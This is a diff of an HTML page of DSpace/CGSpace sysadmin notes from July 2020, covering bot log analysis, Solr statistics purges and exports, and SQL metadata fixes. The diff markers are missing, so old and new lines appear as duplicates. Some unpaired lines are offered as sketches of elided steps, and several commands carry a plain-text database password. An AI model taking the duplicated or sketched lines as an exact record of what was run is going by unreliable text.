@ -164,9 +164,9 @@ numFound=&quot;41694&quot;
</code></pre><ul>
<li>The IPs all belong to HostRoyale:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | wc -l
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep &#39;01/Jul/2020&#39; | awk &#39;{print $1}&#39; | grep 185.152.250. | sort | uniq | wc -l
81
# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | sort -h
# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep &#39;01/Jul/2020&#39; | awk &#39;{print $1}&#39; | grep 185.152.250. | sort | uniq | sort -h
185.152.250.1
185.152.250.101
185.152.250.103
@ -269,7 +269,7 @@ numFound=&quot;41694&quot;
<li>I purged 20,000 hits from IPs and 45,000 hits from user agents</li>
<li>I will revert the default &ldquo;example&rdquo; agents file back to the upstream master branch of COUNTER-Robots, and then add all my custom ones that are pending in pull requests they haven&rsquo;t merged yet:</li>
</ul>
<pre tabindex="0"><code>$ diff --unchanged-line-format= --old-line-format= --new-line-format='%L' dspace/config/spiders/agents/example ~/src/git/COUNTER-Robots/COUNTER_Robots_list.txt
<pre tabindex="0"><code>$ diff --unchanged-line-format= --old-line-format= --new-line-format=&#39;%L&#39; dspace/config/spiders/agents/example ~/src/git/COUNTER-Robots/COUNTER_Robots_list.txt
Citoid
ecointernet
GigablastOpenSource
@ -285,7 +285,7 @@ Typhoeus
</code></pre><ul>
<li>Just a note that I <em>still</em> can&rsquo;t deploy the <code>6_x-dev-atmire-modules</code> branch as it fails at ant update:</li>
</ul>
<pre tabindex="0"><code> [java] java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'DefaultStorageUpdateConfig': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire method: public void com.atmire.statistics.util.StorageReportsUpdater.setStorageReportServices(java.util.List); nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'cuaEPersonStorageReportService': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO com.atmire.dspace.cua.CUAStorageReportServiceImpl$CUAEPersonStorageReportServiceImpl.CUAEPersonStorageReportDAO; nested exception is org.springframework.beans.factory.NoUniqueBeanDefinitionException: No qualifying bean of type [com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO] is defined: expected single matching bean but found 2: com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#0,com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#1
<pre tabindex="0"><code> [java] java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;DefaultStorageUpdateConfig&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire method: public void com.atmire.statistics.util.StorageReportsUpdater.setStorageReportServices(java.util.List); nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;cuaEPersonStorageReportService&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO com.atmire.dspace.cua.CUAStorageReportServiceImpl$CUAEPersonStorageReportServiceImpl.CUAEPersonStorageReportDAO; nested exception is org.springframework.beans.factory.NoUniqueBeanDefinitionException: No qualifying bean of type [com.atmire.dspace.cua.dao.storage.CUAEPersonStorageReportDAO] is defined: expected single matching bean but found 2: com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#0,com.atmire.dspace.cua.dao.impl.CUAStorageReportDAOImpl$CUAEPersonStorageReportDAOImpl#1
</code></pre><ul>
<li>I had told Atmire about this several weeks ago&hellip; but I reminded them again in the ticket
<ul>
@ -308,23 +308,23 @@ Typhoeus
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -g -s 'http://localhost:8081/solr/statistics-2019/select?q=*:*&amp;fq=time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z%5D&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ curl -g -s &#39;http://localhost:8081/solr/statistics-2019/select?q=*:*&amp;fq=time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z%5D&amp;rows=0&amp;wt=json&amp;indent=true&#39;
{
&quot;responseHeader&quot;:{
&quot;status&quot;:0,
&quot;QTime&quot;:0,
&quot;params&quot;:{
&quot;q&quot;:&quot;*:*&quot;,
&quot;indent&quot;:&quot;true&quot;,
&quot;fq&quot;:&quot;time:[2019-01-01T00:00:00Z TO 2019-06-30T23:59:59Z]&quot;,
&quot;rows&quot;:&quot;0&quot;,
&quot;wt&quot;:&quot;json&quot;}},
&quot;response&quot;:{&quot;numFound&quot;:7784285,&quot;start&quot;:0,&quot;docs&quot;:[]
&#34;responseHeader&#34;:{
&#34;status&#34;:0,
&#34;QTime&#34;:0,
&#34;params&#34;:{
&#34;q&#34;:&#34;*:*&#34;,
&#34;indent&#34;:&#34;true&#34;,
&#34;fq&#34;:&#34;time:[2019-01-01T00:00:00Z TO 2019-06-30T23:59:59Z]&#34;,
&#34;rows&#34;:&#34;0&#34;,
&#34;wt&#34;:&#34;json&#34;}},
&#34;response&#34;:{&#34;numFound&#34;:7784285,&#34;start&#34;:0,&#34;docs&#34;:[]
}}
</code></pre><ul>
<li>But not in solr-import-export-json&hellip; hmmm&hellip; seems we need to URL encode <em>only</em> the date range itself, but not the brackets:</li>
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z]' -k uid
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f &#39;time:%5B2019-01-01T00%3A00%3A00Z%20TO%202019-06-30T23%3A59%3A59Z]&#39; -k uid
$ zstd /tmp/statistics-2019-1.json
</code></pre><ul>
<li>Then import it on my local dev environment:</li>
@ -358,11 +358,11 @@ $ ./run.sh -s http://localhost:8080/solr/statistics -a import -o ~/Downloads/sta
</li>
<li>I noticed that we have 20,000 distinct values for <code>dc.subject</code>, but there are at least 500 that are lower or mixed case that we should simply uppercase without further thought:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ &#39;[[:lower:]]&#39;;
</code></pre><ul>
<li>DSpace Test needs a different query because it is running DSpace 6 with UUIDs for everything:</li>
</ul>
<pre tabindex="0"><code>dspace63=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:lower:]]';
<pre tabindex="0"><code>dspace63=# UPDATE metadatavalue SET text_value=UPPER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ &#39;[[:lower:]]&#39;;
</code></pre><ul>
<li>Note the use of the POSIX character class :)</li>
<li>I suggest that we generate a list of the top 5,000 values that don&rsquo;t match AGROVOC so that Sisay can correct them
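<li>A sketch of that export, reusing the <code>\COPY</code> pattern from elsewhere in these notes (the output path is assumed):
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 GROUP BY text_value ORDER BY count DESC LIMIT 5000) TO /tmp/2020-07-05-subjects.csv WITH CSV HEADER;
</code></pre></li>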
@ -399,16 +399,16 @@ $ csvcut -c1 /tmp/2020-07-05-subjects-upper.csv | head -n 6500 &gt; 2020-07-05-c
<ul>
<li>Peter asked me to send him a list of sponsors on CGSpace</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.description.sponsorship&quot;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY &quot;dc.description.sponsorship&quot; ORDER BY count DESC) TO /tmp/2020-07-07-sponsors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.description.sponsorship&#34;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY &#34;dc.description.sponsorship&#34; ORDER BY count DESC) TO /tmp/2020-07-07-sponsors.csv WITH CSV HEADER;
COPY 707
</code></pre><ul>
<li>I ran it quickly through my <code>csv-metadata-quality</code> tool and found two issues that I will correct with <code>fix-metadata-values.py</code> on CGSpace immediately:</li>
</ul>
<pre tabindex="0"><code>$ cat 2020-07-07-fix-sponsors.csv
dc.description.sponsorship,correct
&quot;Ministe`re des Affaires Etrange`res et Européennes, France&quot;,&quot;Ministère des Affaires Étrangères et Européennes, France&quot;
&quot;Global Food Security Programme, United Kingdom&quot;,&quot;Global Food Security Programme, United Kingdom&quot;
$ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
&#34;Ministe`re des Affaires Etrange`res et Européennes, France&#34;,&#34;Ministère des Affaires Étrangères et Européennes, France&#34;
&#34;Global Food Security Programme, United Kingdom&#34;,&#34;Global Food Security Programme, United Kingdom&#34;
$ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -t correct -m 29
</code></pre><ul>
<li>Upload the Capacity Development July newsletter to CGSpace for Ben Hack because Abenet and Bizu usually do it, but they are currently offline due to the Internet being turned off in Ethiopia
<ul>
@ -432,9 +432,9 @@ $ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -
<ul>
<li>Generate a CSV of all the AGROVOC subjects that didn&rsquo;t match from the top 6500 I exported earlier this week:</li>
</ul>
<pre tabindex="0"><code>$ csvgrep -c 'number of matches' -r &quot;^0$&quot; 2020-07-05-cgspace-subjects.csv | csvcut -c 1 &gt; 2020-07-05-cgspace-invalid-subjects.csv
<pre tabindex="0"><code>$ csvgrep -c &#39;number of matches&#39; -r &#34;^0$&#34; 2020-07-05-cgspace-subjects.csv | csvcut -c 1 &gt; 2020-07-05-cgspace-invalid-subjects.csv
</code></pre><ul>
<li>Yesterday Gabriela from CIP emailed to say that she was removing the accents from her authors' names because of &ldquo;funny character&rdquo; issues with reports generated from CGSpace
<li>Yesterday Gabriela from CIP emailed to say that she was removing the accents from her authors&rsquo; names because of &ldquo;funny character&rdquo; issues with reports generated from CGSpace
<ul>
<li>I told her that it&rsquo;s probably her Windows / Excel that is messing up the data, and she figured out how to open them correctly!</li>
<li>Now she says she doesn&rsquo;t want to remove the accents after all and she sent me a new list of corrections</li>
@ -442,13 +442,13 @@ $ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ csvgrep -c 2 -r &quot;^.+$&quot; ~/Downloads/cip-authors-GH-20200706.csv | csvgrep -c 1 -r &quot;^.*[À-ú].*$&quot; | csvgrep -c 2 -r &quot;^.*[À-ú].*$&quot; -i | csvcut -c 1,2
<pre tabindex="0"><code>$ csvgrep -c 2 -r &#34;^.+$&#34; ~/Downloads/cip-authors-GH-20200706.csv | csvgrep -c 1 -r &#34;^.*[À-ú].*$&#34; | csvgrep -c 2 -r &#34;^.*[À-ú].*$&#34; -i | csvcut -c 1,2
dc.contributor.author,correction
&quot;López, G.&quot;,&quot;Lopez, G.&quot;
&quot;Gómez, R.&quot;,&quot;Gomez, R.&quot;
&quot;García, M.&quot;,&quot;Garcia, M.&quot;
&quot;Mejía, A.&quot;,&quot;Mejia, A.&quot;
&quot;Quiróz, Roberto A.&quot;,&quot;Quiroz, R.&quot;
&#34;López, G.&#34;,&#34;Lopez, G.&#34;
&#34;Gómez, R.&#34;,&#34;Gomez, R.&#34;
&#34;García, M.&#34;,&#34;Garcia, M.&#34;
&#34;Mejía, A.&#34;,&#34;Mejia, A.&#34;
&#34;Quiróz, Roberto A.&#34;,&#34;Quiroz, R.&#34;
</code></pre><ul>
<li>
<p>csvgrep from the csvkit suite is <em>so cool</em>:</p>
@ -475,7 +475,7 @@ dc.contributor.author,correction
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.contributor.affiliation&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-07-08-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-07-08-affiliations.csv WITH CSV HEADER;
</code></pre><ul>
<li>Then I stripped the CSV header and quotes to make it a plain text file and ran <code>ror-lookup.py</code>:</li>
</ul>
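<ul>
<li>That step is elided in this hunk; a plausible version with csvkit and sed (the output filename is assumed):</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c 1 /tmp/2020-07-08-affiliations.csv | sed -e &#39;1d&#39; -e &#39;s/&#34;//g&#39; &gt; /tmp/affiliations.txt
</code></pre>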
@ -510,12 +510,12 @@ $ csvgrep -c matched -m false 2020-07-08-affiliations-ror.csv | wc -l
<li>So now our matching improves to 1515 out of 5866 (25.8%)</li>
<li>Gabriela from CIP said that I should run the author corrections minus those that remove accent characters so I will run it on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-09-fix-90-cip-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correction -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-09-fix-90-cip-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correction -m 3
</code></pre><ul>
<li>Apply 110 fixes and 90 deletions to sponsorships that Peter sent me a few days ago:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-07-fix-110-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct/action' -m 29
$ ./delete-metadata-values.py -i /tmp/2020-07-07-delete-90-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-07-fix-110-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -t &#39;correct/action&#39; -m 29
$ ./delete-metadata-values.py -i /tmp/2020-07-07-delete-90-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29
</code></pre><ul>
<li>Start a full Discovery re-index on CGSpace:</li>
</ul>
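<pre tabindex="0"><code># a sketch of the usual full-rebuild invocation, with the niceness wrappers used elsewhere in these notes:
$ time chrt -b 0 ionice -c2 -n7 dspace index-discovery -b
</code></pre>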
@ -552,7 +552,7 @@ $ csvgrep -c matched -m true 2020-07-09-cgspace-sponsors-crossref.csv | wc -l
</ul>
</li>
</ul>
<pre tabindex="0"><code># grep 199.47.87 dspace.log.2020-07-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code># grep 199.47.87 dspace.log.2020-07-12 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2815
</code></pre><ul>
<li>So I need to add this alternative user-agent to the Tomcat Crawler Session Manager valve to force it to re-use a common bot session</li>
@ -567,7 +567,7 @@ $ csvgrep -c matched -m true 2020-07-09-cgspace-sponsors-crossref.csv | wc -l
</code></pre><ul>
<li>Generate a list of sponsors to update our controlled vocabulary:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.description.sponsorship&quot;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY &quot;dc.description.sponsorship&quot; ORDER BY count DESC LIMIT 125) TO /tmp/2020-07-12-sponsors.csv;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.description.sponsorship&#34;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY &#34;dc.description.sponsorship&#34; ORDER BY count DESC LIMIT 125) TO /tmp/2020-07-12-sponsors.csv;
COPY 125
dspace=# \q
$ csvcut -c 1 --tabs /tmp/2020-07-12-sponsors.csv &gt; dspace/config/controlled-vocabularies/dc-description-sponsorship.xml
@ -590,12 +590,12 @@ $ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/dc-descripti
<ul>
<li>I ran the <code>dspace cleanup -v</code> process on CGSpace and got an error:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(189618) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(189618) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code>$ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (189618, 188837);'
<pre tabindex="0"><code>$ psql -d dspace -U dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (189618, 188837);&#39;
UPDATE 1
</code></pre><ul>
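<li>After clearing the <code>primary_bitstream_id</code> the cleanup can simply be re-run:</li>
</ul>
<pre tabindex="0"><code>$ dspace cleanup -v
</code></pre><ul>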
<li>Udana from WLE asked me about some items that didn&rsquo;t show Altmetric donuts
@ -625,13 +625,13 @@ COPY 194
$ csvgrep -c matched -m false /tmp/2020-07-15-countries-resolved.csv
country,match type,matched
CAPE VERDE,,false
&quot;KOREA, REPUBLIC&quot;,,false
&#34;KOREA, REPUBLIC&#34;,,false
PALESTINE,,false
&quot;CONGO, DR&quot;,,false
COTE D'IVOIRE,,false
&#34;CONGO, DR&#34;,,false
COTE D&#39;IVOIRE,,false
RUSSIA,,false
SYRIA,,false
&quot;KOREA, DPR&quot;,,false
&#34;KOREA, DPR&#34;,,false
SWAZILAND,,false
MICRONESIA,,false
TIBET,,false
@ -642,16 +642,16 @@ IRAN,,false
</code></pre><ul>
<li>Check the database for DOIs that are not in the preferred &ldquo;<a href="https://doi.org/">https://doi.org/</a>&rdquo; format:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT text_value as &quot;cg.identifier.doi&quot; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=220 AND text_value NOT LIKE 'https://doi.org/%') TO /tmp/2020-07-15-doi.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT text_value as &#34;cg.identifier.doi&#34; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=220 AND text_value NOT LIKE &#39;https://doi.org/%&#39;) TO /tmp/2020-07-15-doi.csv WITH CSV HEADER;
COPY 186
</code></pre><ul>
<li>Then I imported them into OpenRefine and replaced them in a new &ldquo;correct&rdquo; column using this GREL transform:</li>
</ul>
<pre tabindex="0"><code>value.replace(&quot;dx.doi.org&quot;, &quot;doi.org&quot;).replace(&quot;http://&quot;, &quot;https://&quot;).replace(&quot;https://dx,doi,org&quot;, &quot;https://doi.org&quot;).replace(&quot;https://doi.dx.org&quot;, &quot;https://doi.org&quot;).replace(&quot;https://dx.doi:&quot;, &quot;https://doi.org&quot;).replace(&quot;DOI: &quot;, &quot;https://doi.org/&quot;).replace(&quot;doi: &quot;, &quot;https://doi.org/&quot;).replace(&quot;http://dx.doi.org&quot;, &quot;https://doi.org&quot;).replace(&quot;https://dx. doi.org. &quot;, &quot;https://doi.org&quot;).replace(&quot;https://dx.doi&quot;, &quot;https://doi.org&quot;).replace(&quot;https://dx.doi:&quot;, &quot;https://doi.org/&quot;).replace(&quot;hdl.handle.net&quot;, &quot;doi.org&quot;)
<pre tabindex="0"><code>value.replace(&#34;dx.doi.org&#34;, &#34;doi.org&#34;).replace(&#34;http://&#34;, &#34;https://&#34;).replace(&#34;https://dx,doi,org&#34;, &#34;https://doi.org&#34;).replace(&#34;https://doi.dx.org&#34;, &#34;https://doi.org&#34;).replace(&#34;https://dx.doi:&#34;, &#34;https://doi.org&#34;).replace(&#34;DOI: &#34;, &#34;https://doi.org/&#34;).replace(&#34;doi: &#34;, &#34;https://doi.org/&#34;).replace(&#34;http://dx.doi.org&#34;, &#34;https://doi.org&#34;).replace(&#34;https://dx. doi.org. &#34;, &#34;https://doi.org&#34;).replace(&#34;https://dx.doi&#34;, &#34;https://doi.org&#34;).replace(&#34;https://dx.doi:&#34;, &#34;https://doi.org/&#34;).replace(&#34;hdl.handle.net&#34;, &#34;doi.org&#34;)
</code></pre><ul>
<li>Then I fixed the DOIs on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-15-fix-164-DOIs.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.doi -t 'correct' -m 220
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-15-fix-164-DOIs.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.identifier.doi -t &#39;correct&#39; -m 220
</code></pre><ul>
<li>I filed <a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/issues/10">an issue on Debian&rsquo;s iso-codes</a> project to ask why &ldquo;Swaziland&rdquo; does not appear in the ISO 3166-3 list of historical country names despite it being changed to &ldquo;Eswatini&rdquo; in 2018.</li>
<li>Atmire responded about the Solr issue
@ -666,7 +666,7 @@ COPY 186
<ul>
<li>Looking at the nginx logs on CGSpace (linode18) last night I see that the Macaroni Bros have started using a unique identifier for at least one of their harvesters:</li>
</ul>
<pre tabindex="0"><code>217.64.192.138 - - [20/Jul/2020:01:01:39 +0200] &quot;GET /rest/rest/bitstreams/114779/retrieve HTTP/1.0&quot; 302 138 &quot;-&quot; &quot;ILRI Livestock Website Publications importer BOT&quot;
<pre tabindex="0"><code>217.64.192.138 - - [20/Jul/2020:01:01:39 +0200] &#34;GET /rest/rest/bitstreams/114779/retrieve HTTP/1.0&#34; 302 138 &#34;-&#34; &#34;ILRI Livestock Website Publications importer BOT&#34;
</code></pre><ul>
<li>I still see 12,000 records in Solr from this user agent, though.
<ul>
@ -683,7 +683,7 @@ COPY 186
<li>I re-ran the <code>check-spider-hits.sh</code> script with the new lists and purged another 14,000 more stats hits for several years each (2020, 2019, 2018, 2017, 2016), around 70,000 total</li>
<li>I looked at the <a href="https://clarisa.cgiar.org/">CLARISA</a> institutions list again, since I hadn&rsquo;t looked at it in over six months:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/Downloads/response_1595270924560.json | jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/&quot;//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' &gt; /tmp/clarisa-institutions.csv
<pre tabindex="0"><code>$ cat ~/Downloads/response_1595270924560.json | jq &#39;.[] | {name: .name}&#39; | grep name | awk -F: &#39;{print $2}&#39; | sed -e &#39;s/&#34;//g&#39; -e &#39;s/^ //&#39; -e &#39;1iname&#39; | csvcut -l | sed &#39;1s/line_number/id/&#39; &gt; /tmp/clarisa-institutions.csv
</code></pre><ul>
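<li>Side note: jq can emit the raw names directly, which avoids the grep/awk/sed gymnastics (a sketch; the <code>csvcut -l</code> id column is omitted here):</li>
</ul>
<pre tabindex="0"><code>$ jq -r &#39;.[].name&#39; ~/Downloads/response_1595270924560.json | sed &#39;1iname&#39; &gt; /tmp/clarisa-institutions.csv
</code></pre><ul>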
<li>The API still needs a key unless you query from the Swagger web interface
<ul>
@ -732,7 +732,7 @@ Removing unnecessary Unicode (U+200B): Agencia de Servicios a la Comercializaci
</li>
<li>I started processing the 2019 stats in a batch of 1 million on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2019
...
*** Statistics Records with Legacy Id ***
@ -749,7 +749,7 @@ $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2019
</code></pre><ul>
<li>The statistics-2019 finished processing after about 9 hours so I started the 2018 ones:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2018
*** Statistics Records with Legacy Id ***
@ -793,12 +793,12 @@ $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2018
</ul>
</li>
</ul>
<pre tabindex="0"><code>Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
</code></pre><ul>
<li>There were four records so I deleted them:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2018/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:10&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:10&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><ul>
<li>Meeting with Moayad and Peter and Abenet to discuss the latest AReS changes</li>
</ul>
@ -932,7 +932,7 @@ mailto\:team@impactstory\.org
</li>
<li>Export some of the CGSpace Solr stats minus the Atmire CUA schema additions for Salem to play with:</li>
</ul>
<pre tabindex="0"><code>$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:[2019-01-01T00\:00\:00Z TO 2019-06-30T23\:59\:59Z]' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
<pre tabindex="0"><code>$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f &#39;time:[2019-01-01T00\:00\:00Z TO 2019-06-30T23\:59\:59Z]&#39; -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
</code></pre><ul>
<li>
<p>Run system updates on DSpace Test (linode26) and reboot it</p>
@ -1040,7 +1040,7 @@ mailto\:team@impactstory\.org
</code></pre><ul>
<li>This one failed after a few hours:</li>
</ul>
<pre tabindex="0"><code>Record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b couldn't be processed
<pre tabindex="0"><code>Record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b couldn&#39;t be processed
com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
